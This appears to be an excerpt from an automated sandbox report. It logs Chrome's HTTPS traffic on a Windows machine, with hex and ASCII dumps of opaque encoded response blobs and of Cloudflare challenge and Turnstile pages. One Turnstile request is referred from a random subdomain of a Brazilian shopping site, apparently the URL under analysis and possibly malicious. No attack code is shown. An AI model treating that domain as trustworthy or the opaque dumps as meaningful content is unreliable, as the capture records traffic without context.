                                                                                  2025-01-15 01:58:35 UTC1369INData Raw: 48 79 64 71 61 33 4b 32 5a 6e 72 33 56 73 39 71 2b 77 36 47 71 34 4e 72 43 78 73 33 73 33 4d 50 78 31 64 50 66 38 61 2b 76 36 4d 33 58 35 37 6e 78 37 66 43 38 30 4d 44 31 76 75 62 6d 32 4f 41 4c 32 66 6e 63 34 41 49 47 46 41 48 4e 42 42 62 6d 30 77 72 7a 48 50 48 63 36 42 34 68 34 66 6a 56 39 50 76 30 35 67 45 42 35 53 6b 57 4c 77 48 39 36 4f 30 74 36 79 38 42 38 51 67 59 43 2f 58 78 48 42 45 6f 4d 66 30 4e 43 79 54 32 41 54 73 52 4f 54 77 38 52 77 59 33 55 43 73 6c 4b 41 30 63 4a 45 6c 53 52 45 73 75 4c 46 46 52 53 7a 30 62 50 56 59 68 56 31 6c 68 52 57 51 6a 59 7a 51 39 50 44 34 34 51 6c 30 2b 62 54 4a 75 58 6e 46 47 51 58 4a 52 54 6b 78 62 63 32 74 77 54 46 68 77 63 56 64 42 66 6e 68 63 61 57 6c 57 66 30 74 76 58 48 78 76 54 47 61 4d 5a 6c 68 50 59 31
                                                                                  Data Ascii: Hydqa3K2Znr3Vs9q+w6Gq4NrCxs3s3MPx1dPf8a+v6M3X57nx7fC80MD1vubm2OAL2fnc4AIGFAHNBBbm0wrzHPHc6B4h4fjV9Pv05gEB5SkWLwH96O0t6y8B8QgYC/XxHBEoMf0NCyT2ATsROTw8RwY3UCslKA0cJElSREsuLFFRSz0bPVYhV1lhRWQjYzQ9PD44Ql0+bTJuXnFGQXJRTkxbc2twTFhwcVdBfnhcaWlWf0tvXHxvTGaMZlhPY1
                                                                                  2025-01-15 01:58:35 UTC1369INData Raw: 7a 35 79 31 6d 37 32 6a 35 62 79 79 78 4d 43 66 78 74 32 73 79 4d 6a 50 72 39 48 67 38 2b 4b 7a 35 4c 58 59 75 74 48 30 31 64 44 61 7a 2f 76 59 34 2f 66 56 32 63 50 57 36 38 55 43 2b 63 63 4c 44 4d 2f 73 30 4f 44 57 39 76 72 4d 35 4e 51 4d 35 74 6a 77 32 2b 6f 63 39 68 67 5a 42 51 63 67 43 42 6b 6f 36 42 6a 36 44 2f 6f 6f 37 6a 49 6a 48 79 6f 32 36 7a 49 79 4f 53 73 59 4e 44 67 39 4c 51 46 45 47 7a 41 64 52 78 4d 34 51 45 4d 48 50 6b 59 6e 48 6b 51 4e 4c 79 4d 51 4e 79 49 7a 46 69 39 65 56 52 56 49 49 45 34 76 55 7a 45 32 4d 7a 46 41 61 7a 64 65 4b 32 38 6d 5a 44 30 6f 63 6b 6b 39 54 58 4a 67 53 32 70 34 4f 55 35 76 57 48 52 75 58 56 31 36 56 58 52 66 5a 47 6c 70 51 6b 74 63 62 30 78 4a 53 30 31 73 61 4a 4a 6d 63 48 5a 79 61 55 32 48 6c 34 70 37 6c 56 64
                                                                                  Data Ascii: z5y1m72j5byyxMCfxt2syMjPr9Hg8+Kz5LXYutH01dDaz/vY4/fV2cPW68UC+ccLDM/s0ODW9vrM5NQM5tjw2+oc9hgZBQcgCBko6Bj6D/oo7jIjHyo26zIyOSsYNDg9LQFEGzAdRxM4QEMHPkYnHkQNLyMQNyIzFi9eVRVIIE4vUzE2MzFAazdeK28mZD0ockk9TXJgS2p4OU5vWHRuXV16VXRfZGlpQktcb0xJS01saJJmcHZyaU2Hl4p7lVd
                                                                                  2025-01-15 01:58:35 UTC1369INData Raw: 38 6e 65 33 64 62 65 36 61 48 71 78 36 79 37 79 2b 6a 78 34 2f 4c 4e 79 2f 43 75 36 74 79 36 79 66 47 30 31 64 54 53 39 39 72 33 41 4e 6a 30 32 74 6a 64 79 4f 58 68 78 4d 7a 39 36 74 41 57 37 68 73 58 46 65 72 59 46 39 30 4f 38 67 44 61 39 76 37 37 47 42 4d 6f 2f 53 77 6e 4b 50 34 78 45 53 63 44 4d 43 6f 6c 4a 43 45 73 4c 53 54 79 4c 6a 38 36 4d 78 67 38 44 41 51 50 4f 54 45 61 4a 44 4d 55 43 45 6b 6c 43 44 38 39 54 69 59 4e 49 45 6f 2f 44 31 51 6c 57 45 63 61 4f 43 35 4d 54 78 68 56 47 6c 39 6c 49 45 67 33 52 6c 38 6f 51 55 78 63 50 56 35 47 59 54 35 73 5a 6c 56 6c 61 32 74 76 5a 57 34 35 66 55 35 57 4f 6c 32 41 51 6a 68 50 55 6d 5a 45 5a 59 5a 38 59 6b 46 49 69 32 65 4e 64 5a 4a 52 62 6f 5a 56 6d 4a 74 73 6c 48 31 7a 6e 6f 36 4c 6f 4a 4b 6d 67 61 4b 45
                                                                                  Data Ascii: 8ne3dbe6aHqx6y7y+jx4/LNy/Cu6ty6yfG01dTS99r3ANj02tjdyOXhxMz96tAW7hsXFerYF90O8gDa9v77GBMo/SwnKP4xEScDMColJCEsLSTyLj86Mxg8DAQPOTEaJDMUCEklCD89TiYNIEo/D1QlWEcaOC5MTxhVGl9lIEg3Rl8oQUxcPV5GYT5sZlVla2tvZW45fU5WOl2AQjhPUmZEZYZ8YkFIi2eNdZJRboZVmJtslH1zno6LoJKmgaKE
                                                                                  2025-01-15 01:58:35 UTC1369INData Raw: 6a 63 75 64 7a 62 38 2f 48 41 30 4f 58 4e 74 37 58 7a 74 4d 76 76 79 64 7a 36 2f 4e 2f 34 42 74 7a 58 31 38 45 48 43 74 76 48 2b 75 2f 35 79 74 50 69 7a 77 58 69 35 68 51 45 43 67 76 38 49 42 30 57 33 4e 33 78 38 66 72 78 34 4f 48 66 2b 2b 62 71 4b 41 34 4b 37 41 4d 51 37 6a 4d 76 4d 7a 45 53 47 50 55 4b 4c 67 38 52 50 79 6f 35 46 78 34 57 41 69 5a 43 2f 6b 6f 39 43 54 34 73 4c 52 77 51 4c 30 59 65 55 78 55 32 53 43 45 55 4f 6a 67 31 56 44 6c 68 49 54 55 37 56 6a 70 53 50 52 38 2b 4d 30 6c 4a 58 44 68 41 54 55 35 53 51 79 77 74 56 55 39 45 55 54 5a 55 62 7a 52 73 57 48 4b 41 59 32 49 37 5a 54 78 65 5a 48 78 62 5a 48 36 41 61 32 32 41 57 59 56 72 59 46 46 68 61 48 56 59 56 33 42 34 69 48 4a 33 61 35 52 32 66 6f 43 50 6d 33 64 30 5a 58 75 42 59 36 69 62 6a
                                                                                  Data Ascii: jcudzb8/HA0OXNt7XztMvvydz6/N/4BtzX18EHCtvH+u/5ytPizwXi5hQECgv8IB0W3N3x8frx4OHf++bqKA4K7AMQ7jMvMzESGPUKLg8RPyo5Fx4WAiZC/ko9CT4sLRwQL0YeUxU2SCEUOjg1VDlhITU7VjpSPR8+M0lJXDhATU5SQywtVU9EUTZUbzRsWHKAY2I7ZTxeZHxbZH6Aa22AWYVrYFFhaHVYV3B4iHJ3a5R2foCPm3d0ZXuBY6ibj
                                                                                  2025-01-15 01:58:35 UTC1369INData Raw: 33 32 4d 4c 48 38 73 2b 79 7a 72 58 36 33 2b 76 31 37 72 37 57 76 74 7a 77 78 4d 48 4c 42 74 34 4c 35 4f 76 2b 7a 41 76 72 34 41 6b 4f 35 76 51 4c 45 68 48 78 44 74 37 32 44 52 67 45 47 66 67 59 34 76 37 32 4b 65 59 49 41 79 45 41 47 53 67 30 38 69 6f 51 37 69 4d 35 46 2f 51 6d 4d 68 72 32 4f 54 49 64 2b 7a 34 35 41 66 34 64 2f 6a 59 39 42 30 55 59 50 7a 6f 2b 48 55 49 30 4d 79 74 4b 4f 46 6b 71 54 56 49 72 4f 57 42 42 4b 7a 42 62 4f 42 73 33 48 6d 4e 49 56 46 35 58 4a 7a 38 6e 52 56 6b 74 4b 6a 52 75 52 33 4e 4e 56 47 63 31 63 31 4e 50 62 32 41 33 55 59 45 2f 59 31 4e 33 66 6e 31 6b 66 6b 74 47 5a 6e 36 49 67 6d 6d 54 66 32 68 7a 55 57 6c 34 68 5a 75 48 65 48 79 62 64 58 69 4b 6f 34 32 57 67 6d 46 6f 5a 6f 57 62 6f 71 46 35 72 6d 74 71 67 71 61 55 5a 34
                                                                                  Data Ascii: 32MLH8s+yzrX63+v17r7WvtzwxMHLBt4L5Ov+zAvr4AkO5vQLEhHxDt72DRgEGfgY4v72KeYIAyEAGSg08ioQ7iM5F/QmMhr2OTId+z45Af4d/jY9B0UYPzo+HUI0MytKOFkqTVIrOWBBKzBbOBs3HmNIVF5XJz8nRVktKjRuR3NNVGc1c1NPb2A3UYE/Y1N3fn1kfktGZn6IgmmTf2hzUWl4hZuHeHybdXiKo42WgmFoZoWboqF5rmtqgqaUZ4
                                                                                  2025-01-15 01:58:35 UTC1369INData Raw: 78 2b 2f 31 2b 4d 7a 79 30 77 58 59 39 73 50 30 32 2f 67 43 34 75 49 41 37 38 6e 6a 41 38 37 52 35 77 72 53 44 65 73 4d 36 78 33 77 44 77 44 5a 38 52 51 61 49 51 55 58 43 4e 6f 41 48 41 7a 2b 42 43 41 51 4c 51 49 6b 42 53 45 48 4b 41 67 70 44 53 7a 32 45 78 51 74 4e 6a 55 55 4e 76 34 35 45 54 63 6f 52 52 6f 37 42 30 45 6c 50 30 5a 4a 4d 55 4d 6b 53 53 78 46 54 6c 6b 71 53 78 63 7a 4d 55 38 63 54 54 4a 54 4e 42 63 38 57 44 67 69 51 56 77 38 62 55 42 69 4b 32 46 49 59 32 6f 75 53 57 68 59 4e 6b 56 72 63 6e 31 64 62 31 41 36 56 58 4d 2f 64 56 78 33 61 46 39 64 66 45 68 35 5a 58 39 4c 59 32 6d 45 69 70 56 6f 68 59 36 56 5a 49 35 58 6b 58 4b 51 6c 6c 4e 7a 6b 33 53 56 66 5a 68 6b 6c 59 47 62 66 4b 6c 2f 6e 35 43 78 68 71 4f 45 5a 35 57 6f 72 72 57 50 71 62 4a
                                                                                  Data Ascii: x+/1+Mzy0wXY9sP02/gC4uIA78njA87R5wrSDesM6x3wDwDZ8RQaIQUXCNoAHAz+BCAQLQIkBSEHKAgpDSz2ExQtNjUUNv45ETcoRRo7B0ElP0ZJMUMkSSxFTlkqSxczMU8cTTJTNBc8WDgiQVw8bUBiK2FIY2ouSWhYNkVrcn1db1A6VXM/dVx3aF9dfEh5ZX9LY2mEipVohY6VZI5XkXKQllNzk3SVfZhklYGbfKl/n5CxhqOEZ5WorrWPqbJ
                                                                                  2025-01-15 01:58:35 UTC1369INData Raw: 74 62 6b 42 4d 54 53 79 51 49 44 33 75 77 4b 37 2f 6a 51 42 74 48 79 34 78 66 6f 37 74 45 4f 31 68 48 33 46 67 6f 52 2f 42 34 46 45 66 63 58 2b 50 6f 64 4b 2f 77 44 35 53 4c 71 4a 51 4d 6c 4b 79 45 76 4a 6a 49 74 46 54 59 64 4b 54 38 30 4b 55 45 31 50 54 76 39 42 54 34 78 48 7a 56 46 51 78 38 74 53 6a 41 35 43 30 59 53 50 53 52 53 46 45 55 55 53 6c 55 6e 50 56 6b 77 53 6a 4e 56 49 6a 4e 46 59 6a 6b 37 53 57 56 4d 56 57 35 69 4c 6b 4e 41 62 54 42 68 64 32 5a 78 65 56 6c 34 54 47 5a 50 63 54 35 62 59 58 74 41 57 46 53 44 57 6c 4e 64 67 6f 4a 32 58 34 46 4f 6b 58 47 50 5a 6c 39 70 6a 6f 39 72 65 5a 64 75 5a 33 43 57 6c 6f 70 7a 6c 57 4a 37 68 61 4e 36 63 33 79 69 6f 33 2b 4e 71 34 4a 37 67 36 71 71 6e 6f 65 70 64 6f 75 5a 74 34 36 48 6a 37 61 33 6b 36 47 2f
                                                                                  Data Ascii: tbkBMTSyQID3uwK7/jQBtHy4xfo7tEO1hH3FgoR/B4FEfcX+PodK/wD5SLqJQMlKyEvJjItFTYdKT80KUE1PTv9BT4xHzVFQx8tSjA5C0YSPSRSFEUUSlUnPVkwSjNVIjNFYjk7SWVMVW5iLkNAbTBhd2ZxeVl4TGZPcT5bYXtAWFSDWlNdgoJ2X4FOkXGPZl9pjo9reZduZ3CWlopzlWJ7haN6c3yio3+Nq4J7g6qqnoepdouZt46Hj7a3k6G/


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  18192.168.2.449774104.18.95.414438688C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-15 01:58:36 UTC597OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/58773639:1736903612:qJGc1e2dAaYtSb8S_Pl2oWagprYsbTE0u73qNtbBmWI/902242d8f9180f6d/aVfuuxLC46yOeh14YdFyp1RNJvO.5evD5Dx3tNm6VWg-1736906310-1.1.1.1-gHdCWsDgrEoUEe038cbis_E3mVHefnMgQL5Deg5vkmDY7fx6fF4wbzi0lfy3_HDa HTTP/1.1
                                                                                  Host: challenges.cloudflare.com
                                                                                  Connection: keep-alive
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  Accept: */*
                                                                                  Sec-Fetch-Site: none
                                                                                  Sec-Fetch-Mode: cors
                                                                                  Sec-Fetch-Dest: empty
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2025-01-15 01:58:36 UTC442INHTTP/1.1 400 Bad Request
                                                                                  Date: Wed, 15 Jan 2025 01:58:36 GMT
                                                                                  Content-Type: application/json
                                                                                  Content-Length: 14
                                                                                  Connection: close
                                                                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                  cf-chl-out: Mv8p97G6A9lOfPcT8poeINsP0SqZPl7cBq78gfNSiZUeqsfRAjMGy3Zf091cGebah9s0mN0UYQ6SeBnWoWr2AQ==$sqiMVkD4HdyqcLa0TTXx8g==
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 902242fe9baa43f3-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  2025-01-15 01:58:36 UTC14INData Raw: 7b 22 65 72 72 22 3a 31 30 30 32 33 30 7d
                                                                                  Data Ascii: {"err":100230}


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  19192.168.2.456733104.18.94.414438688C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-15 02:00:36 UTC814OUTGET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/uz3u1/0x4AAAAAAA5OKIzF1t1zkHd6/auto/fbE/normal/auto/ HTTP/1.1
                                                                                  Host: challenges.cloudflare.com
                                                                                  Connection: keep-alive
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  Upgrade-Insecure-Requests: 1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Sec-Fetch-Site: cross-site
                                                                                  Sec-Fetch-Mode: navigate
                                                                                  Sec-Fetch-Dest: iframe
                                                                                  Referer: https://aifunygg.planaltinashopping.com.br/
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2025-01-15 02:00:36 UTC1362INHTTP/1.1 200 OK
                                                                                  Date: Wed, 15 Jan 2025 02:00:36 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 26656
                                                                                  Connection: close
                                                                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                  permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                  content-security-policy: frame-src https://challenges.cloudflare.com/; base-uri 'self'
                                                                                  cross-origin-embedder-policy: require-corp
                                                                                  cross-origin-opener-policy: same-origin
                                                                                  cross-origin-resource-policy: cross-origin
                                                                                  origin-agent-cluster: ?1
                                                                                  accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                  critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                  referrer-policy: same-origin
                                                                                  document-policy: js-profiling
                                                                                  2025-01-15 02:00:36 UTC82INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 39 30 32 32 34 35 65 63 65 62 30 65 35 65 36 36 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                                  Data Ascii: Server: cloudflareCF-RAY: 902245eceb0e5e66-EWRalt-svc: h3=":443"; ma=86400
                                                                                  2025-01-15 02:00:36 UTC1294INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                                                                  Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                                                                  2025-01-15 02:00:36 UTC1369INData Raw: 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65
                                                                                  Data Ascii: dding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-webkit-font-smoothing:antialiase
                                                                                  2025-01-15 02:00:36 UTC1369INData Raw: 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 66 69 6c 6c 3a 23
                                                                                  Data Ascii: stroke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;stroke-miterlimit:10;stroke:#038127;fill:#
                                                                                  2025-01-15 02:00:36 UTC1369INData Raw: 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72
                                                                                  Data Ascii: e-dark #challenge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dar
                                                                                  2025-01-15 02:00:36 UTC1369INData Raw: 32 30 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68
                                                                                  Data Ascii: 20}.theme-dark .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-h
                                                                                  2025-01-15 02:00:36 UTC1369INData Raw: 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 3b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 61 6e 69 6d 61 74 69 6f 6e 3a 73 74 72 6f 6b 65 20 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 66 61 69 6c 75 72 65 2d 63 72 6f 73 73 7b 66 69 6c 6c 3a 23 66 66 66 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 62 6f 74 74 6f 6d 20 63 65 6e 74 65 72 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 2d 69 6e 2e 61 6e 69 6d 61 74 69 6f 6e 7b 30 25 7b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 73 74 72 6f 6b 65 3a 23 64 65 31
                                                                                  Data Ascii: ;stroke-dashoffset:166;stroke-width:2;stroke-miterlimit:10;stroke:#de1303;fill:#de1303;animation:stroke .6s cubic-bezier(.65,0,.45,1) forwards}.failure-cross{fill:#fff;transform-origin:bottom center}@keyframes fade-in.animation{0%{fill:#de1303;stroke:#de1
                                                                                  2025-01-15 02:00:36 UTC1369INData Raw: 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 66 6c 6f 77 3a 63 6f 6c 75 6d 6e 20 6e 6f 77 72 61 70 3b 67 61 70 3a 30 3b 68 65 69 67 68 74 3a 31 34 30 70 78 3b 70 61 64 64 69 6e 67 3a 31 32 70 78 20 30 3b 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 6c 69 6e 6b 2d 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 33 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d
                                                                                  Data Ascii: ay:flex;flex-flow:column nowrap;gap:0;height:140px;padding:12px 0;place-content:space-between}.size-compact .link-spacer{margin-left:3px;margin-right:3px}.size-compact .cb-c{margin:0 12px;text-align:left}.size-compact .cb-container{margin:0 12px}.size-com
                                                                                  2025-01-15 02:00:36 UTC1369INData Raw: 69 7b 6c 65 66 74 3a 32 35 35 70 78 7d 2e 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 2c 2e 72 74 6c 20 23 66 72 2d 6f 76 65 72 72 75 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 2c 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 61 6c 69 67 6e 2d 73 65 6c 66 3a 66 6c 65
